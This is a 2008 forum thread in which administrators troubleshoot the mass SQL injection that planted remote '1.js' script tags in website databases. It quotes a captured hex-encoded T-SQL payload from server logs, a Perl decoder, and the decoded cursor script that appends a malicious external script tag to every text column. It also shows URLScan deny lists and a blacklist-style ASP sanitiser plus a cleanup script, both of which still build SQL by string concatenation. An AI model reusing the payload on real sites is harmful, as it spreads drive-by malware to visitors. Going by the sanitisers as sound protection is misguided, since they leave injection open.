Security

Re: Anyone know about www.nihaorr1.com/1.js?

Paul Bishop — Sat, 13 Dec 2008 02:14:22 GMT

this is an sql injection attack. you must remove the <script ..... to ...</script>

it copies it self at the end of any text column it can.

in asp

function stripQuotes(strWords) stripQuotes = replace(strWords, "'", "''")

end function

function killChars(strWords)

dim badChars

dim newCharsbadChars = array("select ", "drop ", ";", "--", "insert ", "delete ", "xp_", " or ", "or ")

newChars = strWords

for i = 0 to uBound(badChars)

newChars = replace(newChars, badChars(i), "")

killChars = newChars

end function

bco = stripQuotes(killChars(replace(request("bco"), "'", "")))

you must use this on all requested data

you must even use it on things like request server variables

because the 1.js file link can be attached to os or ref server vars

do it on the backend as well or textbox or chk box radio if your requesting it it can be attached no need to worry about session objects unless you request an element and assign it to a session object integers are not affected

this is a sample script of how to remove from the db

os is the text column

<% response.Buffer=False %>

Server.ScriptTimeout = 50000

dim pida(4500000)

dim descr(4500000)

dim ldescr(4500000)

SQLStmt = "SELECT osid, os From OS "

Set RS = dbSubs.Execute(SQLStmt) do while checkrs(rs)

if len(rs("os")) > 0 then

pida(i) = rs("osid") descrx = replace(rs("os"), "<script src=http://17gamo.com/1.js></script>" ,"")

descr(i) = replace(descrx, "'", "")

i = I + 1

end if

rs.movenext

loop for p = 0 to (i -1)

response.Write pid & " " & descr(p) & "<br>"

SQLStmt = "UPDATE OS SET os = '" & descr(p) & "' WHERE osid= '" & pida(p) & "' ; "

Set RS = dbSubs.Execute(SQLStmt)

Re: Anyone know about www.nihaorr1.com/1.js?

silkyfixer — Tue, 26 Aug 2008 04:21:25 GMT

problem is that i can dump all the logs and parse through them but i dont know what to look for since the urlscan kicks out the declare it must be something else.

silkyfixer

Re: Anyone know about www.nihaorr1.com/1.js?

silkyfixer — Tue, 26 Aug 2008 02:38:25 GMT

ok i have no idea but somehow the urlscan is not working i put in the statemets of your config and it still got infected today. there must be some way around the declare statement.

is there any way to create a trigger on the mssql database to tell me what site the update injects the script code . since i never insert or update any of my tables with <script in it i think this will pinpoint were the attack is coming from.

my urlscan shows it blocking declare and other random injections but it still gets infected. so i would assume they are no longer using a declare statement. or have a way around the declare statement.

again over 500 sites connect to the same database so i have no idea how or where the injection comes from.

i am not a coder so i would not know where or how to write a trigger to store in a log file where the injection came from.

thank you

silkyfixer

Re: Anyone know about www.nihaorr1.com/1.js?

silkyfixer — Fri, 22 Aug 2008 22:22:45 GMT

when this first happend to me last year befor the massive web attack i copied all the log files to my unix box and i used grep to parse through the files. it took me a while to pin point the injection since it was not in the wild at the time. I had coder write a decrypt script to decode the hex

#!/usr/bin/perl

my $s=<<"EOF";
4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F72204355
52534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E732062205748
45524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220
622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D2054
61626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E2045584543282755504441
5445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522838303030292C5B272B40432B275D2929
2B27273C736372697074207372633D687474703A2F2F7777772E62616E6E657238322E636F6D2F622E6A733E3C2F7363726970743E27272729204645544348
204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C
4F43415445205461626C655F437572736F72
EOF
while (length($s)>0) {
my $hex=substr($s,0,2); $s=substr($s,2,length($s));
my $ch=hex($hex); $ch=pack("C",$ch);
print $ch;

}

now decoded you notice that its what was in the wild

DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(8000),['+@C+']))+''<script src=http://www.banner82.com/b.js></script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

the question is have they found a new way to inject without the declare or a way around dequoting the injection. i have a fealing its a new type of attack and they dont use a declare.

i will sift through the logs and see what i can find but its hard when you have hundreds of sites and log files

it would be great if someone could write a trigger for mssql so that anytime an update contains %<script etc.. it will tell me what site it came from. this would help out greatly as i can then pinpoint where it came from. maybe mssql-scan :)

Re: Anyone know about www.nihaorr1.com/1.js?

steve schofield — Fri, 22 Aug 2008 20:22:22 GMT

If you are running the rtw version of URLScan3, the logs are w3c complient and you can use log parser against it. Also, in the logs you posted, have the SITEID property. That way would help narrow down which requests being blocked.

you could select the s-siteid property. You could sort it by ID ascending then compare. That is one way off-hand if you have a lot of sites hiting the db.

http://blogs.iis.net/nazim/archive/2008/08/19/urlscan-v3-0-rtw-released.aspx

Another way would be to create a log parser script that goes through your w3svc files and pipes the data to an external file. When hunting and pecking like this, copying the affected files to a separate location and hitting with log parser is effective. You could have a recursive script copy the log to a single location then hit with log parser. Hope that helps.

Re: Anyone know about www.nihaorr1.com/1.js?

silkyfixer — Fri, 22 Aug 2008 17:25:11 GMT

here is a snibblet from the log of the urlscan you can see it kicks out the declare so how did it sneak through ? i have about 500 websites that connect to the database so its hard to pinpoint were or how it gets through

[08-22-2008 - 11:41:59] Client at 80.99.117.220: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/m.asp'
[08-22-2008 - 11:46:44] Client at 189.46.158.208: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/m-webtv.asp'
[08-22-2008 - 12:05:47] Client at 189.129.167.129: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/m.asp'
[08-22-2008 - 12:05:48] Client at 189.129.167.129: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/m.asp'
[08-22-2008 - 12:13:54] Client at 59.29.234.153: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/m.asp'
[08-22-2008 - 12:20:58] Client at 201.170.148.3: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/m.asp'
[08-22-2008 - 12:20:59] Client at 201.170.148.3: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/m.asp'
[08-22-2008 - 12:32:01] Client at 189.24.155.56: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/m-webtv.asp'
[08-22-2008 - 12:32:01] Client at 189.24.155.56: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/m.asp'
[08-22-2008 - 12:37:57] Client at 189.149.188.56: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/m.asp'
[08-22-2008 - 12:37:57] Client at 189.149.188.56: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/m.asp'
[08-22-2008 - 12:39:22] Client at 201.34.214.205: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/m.asp'
[08-22-2008 - 12:39:45] Client at 85.99.42.197: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/m.asp'
[08-22-2008 - 12:43:10] Client at 124.121.28.118: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/m-webtv.asp'
[08-22-2008 - 12:49:21] Client at 201.211.113.200: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/y.asp'
[08-22-2008 - 12:58:06] Client at 122.168.200.189: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/m.asp'
[08-22-2008 - 13:04:54] Client at 190.19.198.60: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/y.asp'
[08-22-2008 - 13:05:58] Client at 122.163.163.163: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/m.asp'
[08-22-2008 - 13:08:22] Client at 190.19.198.60: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/y.asp'
[08-22-2008 - 13:19:44] Client at 195.225.178.21: QueryString contains sequence '%%3C', which is disallowed. Request will be rejected. Site Instance='1643931472', Raw URL='/AddReview.asp', QueryString='txtName=Cialis&txtLocation=PaokyMzP&txtCmnts=Nise+site.%%2C+%%3Ca+href%%3D%%22http%%3A%%2F%%2Fwww.partyvibe.com%%2Fvbulletin%%2Fmember.php%%3Fu%%3D23082%%22%%3ECialis+kaufen%%3C%%2Fa%%3E%%2C++%%25DD%%2C+%%3Ca+href%%3D%%22http%%3A%%2F%%2Fwww.newmediamedicine.com%%2Fforum%%2Fmembers%%2Fsamuelbooker.html%%22%%3EValium+online%%0D%%3C%%2Fa%%3E%%2C++5776%%2C+%%3Ca+href%%3D%%22http%%3A%%2F%%2Fwww.newmediamedicine.com%%2Fforum%%2Fmembers%%2Fclaytonwilliams.html%%22%%3ETramadol%%3C%%2Fa%%3E%%2C++54245%%2C+%%3Ca+href%%3D%%22http%%3A%%2F%%2Fvbulletin.thesite.org%%2Fmember.php%%3Fu%%3D31710%%22%%3Eviagra%%3C%%2Fa%%3E%%2C++renuiq%%2C+%%3Ca+href%%3D%%22http%%3A%%2F%%2Fwww.newmediamedicine.com%%2Fforum%%2Fmembers%%2Fkeithbreunig.html%%22%%3EAmbien%%3C%%2Fa%%3E%%2C++nvnti%%2C+%%3Ca+href%%3D%%22http%%3A%%2F%%2Fboard.muse.mu%%2Fmember.php%%3Fu%%3D98088%%22%%3EBuy+Tramadol+online%%0D%%3C%%2Fa%%3E%%2C++tbsvm%%2C+%%3Ca+href%%3D%%22http%%3A%%2F%%2Fwww.newmediamedicine.com%%2Fforum%%2Fmembers%%2Fsamuelbooker.html%%22%%3EDiazepam%%3C%%2Fa%%3E%%2C++ivbp%%2C+%%3Ca+href%%3D%%22http%%3A%%2F%%2Fcommunity.fotopic.net%%2Fuser%%2Fyyogml.html%%22%%3ECheap+Valium%%3C%%2Fa%%3E%%2C++1672%%2C+&escid=1010'

Re: Anyone know about www.nihaorr1.com/1.js?

silkyfixer — Fri, 22 Aug 2008 17:20:25 GMT

[Options]
UseDenyVerbs=1
UseDenyExtensions=1
NormalizeUrlBeforeScan=0
VerifyNormalization=0
AllowHighBitCharacters=1
AllowDotInPath=1
RemoveServerHeader=0
EnableLogging=1
PerProcessLogging=0
AllowLateScanning=0
PerDayLogging=1
UseFastPathReject=0
LogLongUrls=0
UnescapeQueryString=1
RejectResponseUrl=
LoggingDirectory=Logs
AlternateServerName=
RuleList=Edge

[Edge]
AppliesTo=.asp,.aspx,.inc
DenyDataSection=Edge Data
ScanURL=0
ScanAllRaw=0
ScanQueryString=1
ScanHeaders=

[Edge Data]
declare
DECLARE
cursor
CURSOR

[AllowVerbs]
GET
POST
HEAD

[DenyVerbs]
PROPFIND
CONNECT

[DenyExtensions]
.bat
.cmd

[DenyQueryStringSequences]
<
>

if i try to use some of the ones i find on the net it breaks most of my sites.

thanks for your time

silkyfixer

Re: Anyone know about www.nihaorr1.com/1.js?

steve schofield — Fri, 22 Aug 2008 16:14:24 GMT

What is your urlscan.ini setup to look for.

[SQL Injection Raw]
AppliesTo=.asp,.aspx

Re: Anyone know about www.nihaorr1.com/1.js?

silkyfixer — Fri, 22 Aug 2008 15:44:20 GMT

i found this for today in my logs i noticed my database was infected this morning. happend last night this is the only declare in my log i wonder if they are using something else other than declare

GET /index.asp ;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); 80 - 65.96.169.213 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+1.1.4322;+.NET+CLR+2.0.50727;+.NET+CLR+3.0.04506.648;+.NET+CLR+3.5.21022) - - 200 0 0 34770 1607 9765

Re: Anyone know about www.nihaorr1.com/1.js?

silkyfixer — Fri, 22 Aug 2008 15:38:20 GMT

my problem is that i have various websites that connect to the same database i need some sort of trigger that catches the update on the database with a <script in the update and tell me what site it came from. i have sanatized most of my code as well but every 2-3 weeks 1 of my databases still gets infected.

would you have a trigger script i could install globaly on my sql server ?

thanks

silkyfixer

Re: Anyone know about www.nihaorr1.com/1.js?

steve schofield — Fri, 22 Aug 2008 04:19:26 GMT

Do you have the IIS logs entry that shows the one that squeeked through?

http://www.iislogs.com/urlscan.txt is my config.

Re: Anyone know about www.nihaorr1.com/1.js?

silkyfixer — Fri, 22 Aug 2008 03:28:03 GMT

well one sneaked through my urlscan 3.0 i am still trying to figuare out how they got past the declare statement. can you post your config ?

silkyfixer

Re: Anyone know about www.nihaorr1.com/1.js?

steve schofield — Thu, 21 Aug 2008 10:43:01 GMT

URLScan 3.0 was released to help with these types of automated attacks.

http://blogs.iis.net/nazim/archive/2008/08/19/urlscan-v3-0-rtw-released.aspx

Re: Anyone know about www.nihaorr1.com/1.js?

kimrennin — Mon, 11 Aug 2008 09:55:33 GMT

The number of infected Web pages spiked to 282,000 in the past day, and appears to be growing. Network managers can check to see whether their Web pages are infected with the iFrame code by looking for a specific code string in the source code of the Web page associated to an iFrame tag. The string is <script src=http://www.nihaorr1.com/1.js>, according to the security vendor.The worst part of it all is that these infestations are not in seamy Web sites, they are taking place in legitimate Web pages. An IFRAME redirects the user to another page, where identity-stealing malware is downloaded onto their computer. So even users who think they are staying clean are not safe. The malicious page scans the visitors machine to find ways to compromise the visitors machine. Exploits are then downloaded and used to infected the redirected visitor based on the
information found on the scan.

---------------------------

kimrennin

WideCircles

Re: Anyone know about www.nihaorr1.com/1.js?

wybnormal — Fri, 20 Jun 2008 21:02:53 GMT

You can stop the SQL attacks with an ISPI filter called "WebKnight" which is a freebie. It will among other things, watch for the string length on the forms and if it exceeds X number of characters, it blocks it. It will also look for embedded commands etc. This has stopped the attacks against our servers for the past three weeks. The company name is "Aqtronix" http://www.aqtronix.com/?PageID=99